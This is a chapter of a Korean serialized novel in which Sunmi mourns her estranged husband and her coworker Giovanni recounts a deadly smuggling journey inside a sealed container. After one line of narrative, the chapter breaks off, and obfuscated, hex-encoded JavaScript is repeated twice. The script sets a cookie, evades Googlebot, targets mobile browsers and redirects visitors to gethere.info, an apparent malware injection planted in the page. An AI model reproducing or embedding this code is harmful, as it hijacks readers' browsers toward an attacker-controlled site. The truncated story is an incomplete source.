아픈다리 서로 기대며 (11)

윤호아빠와 같이 지내던 여자가 임신을 했다면서 사흘 걸러 친정어머니에게 전화를 해서는, ‘같이 살지도 않을 거면서 이혼도 안 해주고, 멀쩡한 남편 놔두고 도망간 년이 무슨 권한이 있다고 붙들고 안 놔주느냐.’ 고 포악을 하고, 처음에는 협박을 하다가 술을 한잔 한 것 같은 밤중에는 애걸복걸하기도 하고, 마침내 ‘윤호 아빠더러 전화하라’고 끊으면,  곧바로 다시 전화를 걸어서 하는 말이,

‘당신들이 이 남자 심정을 단 한번이라도 생각해 봤느냐’ 고 따지고 들면 할 말도 없고, 그래서 제대로 대답도 못했더니 결국 소송을 통해서 이혼을 했나 보더란다. 어디서 사는 줄도 모르고 있다가 이번에 이런 소식을 받게 되었다는 것이다.

아무리 침착하고 정신을 추슬러 보려고 해도 그게 쉽지도 않고, 뚜렷한 답도 없으면서 어느 누구를 붙들어도 해결책이 없다. 오직 자기 혼자만의 문제라는 걸 선미는 알았다.

만남과 결혼, 그리고 결혼으로 인해 탄생한 2세, 그리고 인생이란 무엇인가,

사람들이 이혼을 하고 재혼하는 걸 주변에서 자주 보면서도 그 전까지는 도무지 남의일 같이만 보였던 게 사실이었다. 어쩔 수 없는 상황이라는 것도 죽은 사람 앞에서는 변명의 여지마저 없어져 버렸다. 이혼을 했든지, 헤어져 살았든지 어느 한쪽이 저세상 사람이 되어 있다면 이유를 막론하고 그 책임은 온전히 남아있는 자의 몫이라는 것을 받아들여야만 했다.

imagesCABXMCUB

 

 

 

‘나는 죄인이다.’ 속죄하고 싶어도 지금으로서는 할 수도 없다.

술을 찾기 시작했다. 취할 때의 나른함이 마실 때의 고통을 상쇄하기에 찡그려 가면서까지  한잔씩을 했다. 엎드려 울다가 잠들 때가 많았다. 그렇지 않으면 잠을 이룰 수가 없어서였다.

 

실로 오랜만에 죠바니와 담배시간을 가졌다. 그 동안 나에게 닥친 엄청난 충격이 3개월이 지났는데도 가시지를 않는다. 사람 만난다는 자체가 싫었지만 직업상 그럴 수도 없다는 것이

가장 견디기 힘들었다. 그 동안 감히 말도 못 붙일 상황임을 알고 분위기를 바꿔 보겠다는 듯이 묻지도 않았는데 그의 이야기를 지속해도 괜찮겠느냐고  조심스럽게 눈치를 살핀다. 고개를 끄덕여 주니 이야기를 계속한다.

 

죠바니 일행들이 어두 껌껌한 컨테이너 밑에 뚫린 문으로 한사람씩 올라가니 컨테이너 안이 바깥보다 훨씬 좁아 보였다. 컨테이너 안에 또 다른 벽을 빙 둘러서 이중으로 막고 바깥벽과 내벽사이에는 위장용 박스로 채워서 검문검색을 피하고자 특수 제작한 컨테이너였다. 후레쉬를 켠 코요테가 키가 비슷한 남자끼리 가랑이를 벌리게 해서 앉혔다. 그 앞에 같은 방법으로 줄을 맞추어 차근차근 레고를 깔듯이 빈틈이 없게 앉히는 것이었다. 그런데 쉬지 않고 계속 사람을 태웠다. 누군가 웅성거리자 여지없이 발길질이 날아왔다.

여자들이 마지막으로 태워지고 나니 300명이 넘을 것 같았다. 이제 허리만 좌우로 움직일 뿐 꼼짝을 할 수가 없었다.

밤이라서 바깥이 추웠지만 상상을 초월하게 사람을 태웠으니 땀이 비질비질 나기 시작했다. 차량이 움직이기 시작했다. 앞뒤 분간도 몸이 실려 있다는 것만 느낄 뿐 앞으로의 일은 상상할 수가 없었다. 이제 와서 다시 내리겠다고 할 수도 없다. 천정에 사방20센티 정도의 구멍이 6개 있었는데 유일한 바깥과의 공기구멍이었다. 이윽고 연결된 마이크에서 경고방송이 나왔다. ‘바닥의 출입구가 열리기 전까지는 밖에서 뭐라고 해도 절대로 대답하지 말라.’ 특히 ‘ 그 안에 누구 없나?’ ‘물이 필요하지 않나?’ 물어 올 때 대답하면 모두 죽는다. ‘혹시 옆에서 대답을 하려는 사람이 있으면 입을 막아라.‘

컨테이너 3

 

 

 

죠바니는 두 손을 맞잡고 기도를 했다. 부모님부터 가족, 그리고 여태 살아오면서 만났던 사람들을 떠 올렸다. 얼마나 시간이 지났을까, 목이 타들어간다. 공기구멍이 보다 선명해 지는 것으로 새벽이 되었다는 걸 알 수 있었다. 7시간 정도를 달렸던 것 같았다. 새벽녘에 주유를 하는지 잠시 멈추었다. 장시간 같은 자세로 앉아 있으니 허리가 마비되는 듯했다. 공기구멍으로 인해 어느 정도 실내 윤곽이 드러났다. 늦봄인 탓에 아침이 지나니 차내 온도가 급격하게 오르고 있었다. 어디에선가 오줌냄새가 나기 시작하더니 누군가가 일어서자 덩달아서 몇 명이 일어섰다. 차가 흔들리자 우루루 넘어지고, 서로 일어서려고 하면서 밀고 당기고 밑에 깔리고, 소리 지르고,여기저기 바닥은 오줌과 땀으로 번들거린다. 공기구멍 밑에는 빛도 비추고 공기도 좀 들어오는 느낌도 있지만 구석진 곳은 침침하였다. 일부러 밟으려고 그런 건 아닌데도 앉아있으면 밟히니 모두가 일어났다. 시간이 지날수록 온도는 더 올라가는데 가장 힘든 것은 얼마나 더 가야 내리는지를 모른다는 것이었다. 죠바니는 우술루탄의 저수지에서 물잠뱅이 질 하던 생각이 떠올랐다.

 

열 시간이 지나면서 여기저기에서 똥냄새가 나기 시작한다. 얼마나 또 지났을까, 저쪽 구석지가 술렁거린다. 누군가 주저앉아 있는데 움직이지 않는다는 것이다. 죠바니도 뭘 먹은 것도 없는데 도저히 참을 수가 없어서 선채로 우선 소변을 볼 수밖에 없었다. 누군가 심하게 발악적으로 차벽을 두드리지만 달리는 차, 그것도 이중벽 때문에 밖에서는 들릴 리가 만무하다. 모두 냄새 때문에 입을 벌리고 숨을 몰아쉬니 열기는 더해가고, 공기구멍 사이로 보이는 하늘은 유난히도 파랗다.

‘우리들은 어디에서 와서 지금 어디로 가고 있는 것인가!’  ‘설마 이대로 모두 죽는 것은  아니겠지, 저 사람들도 이런 일을 직업으로 하고 있으니 인간의 한계를 알 것이 아닌가,’

그런데 ‘어쩌면 죽을 수도 있겠다.’ 싶으니 소름이 와락 끼쳤다.

여기저기서 울부짖는 소리가 들린다. 파악이 안 된다. 대체 몇 명이 실신을 하고 지금 상황이 어떻게 되어가는 지를 아무도 모른다.  <!–[endif]–>

 

바닥에는 이제 똥덩어리가 굴러다니고 밟히고 미끈거리고 했지만 냄새에는 이미 무디어 졌다. 바닥에 깔린 사람들을 위해 엎드릴 수가 없으니 어떻게 도울 수도 없다. 주저앉으면 죽음이라는 생각, 그래서 사력을 다해 버텨야 했다.

정신이 가물거린다. 이대로 얼마를 더 버틸 수 있을지, 느닷없는 눈물이 솟구친다.

‘주여, 어디로 가시나이까!’

차마 조마조마해서 들을 수가 없었다. 여기까지 이야기를 마친 죠바니는 더 이상 말을 잇지 못하고 선미의 시선을 피해 고개를 돌리고 눈물을 삼키는 듯하였다. 막내 남동생 창호와 나이도 비슷하고 동생 같다는 생각이 든다. ‘무엇을 위해서 가족과 생이별을 하고 이런 고통을 받고 있는가,‘ 자신도 모르게 그런 그를 안고 등을 쓸어주는 것은 어쩌면 당연 했는지도 모른다.

위로

 

 

 

 

죠바니의 행동에 급격한 변화를 느꼈던 것은 한 달 전쯤 부터였다.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}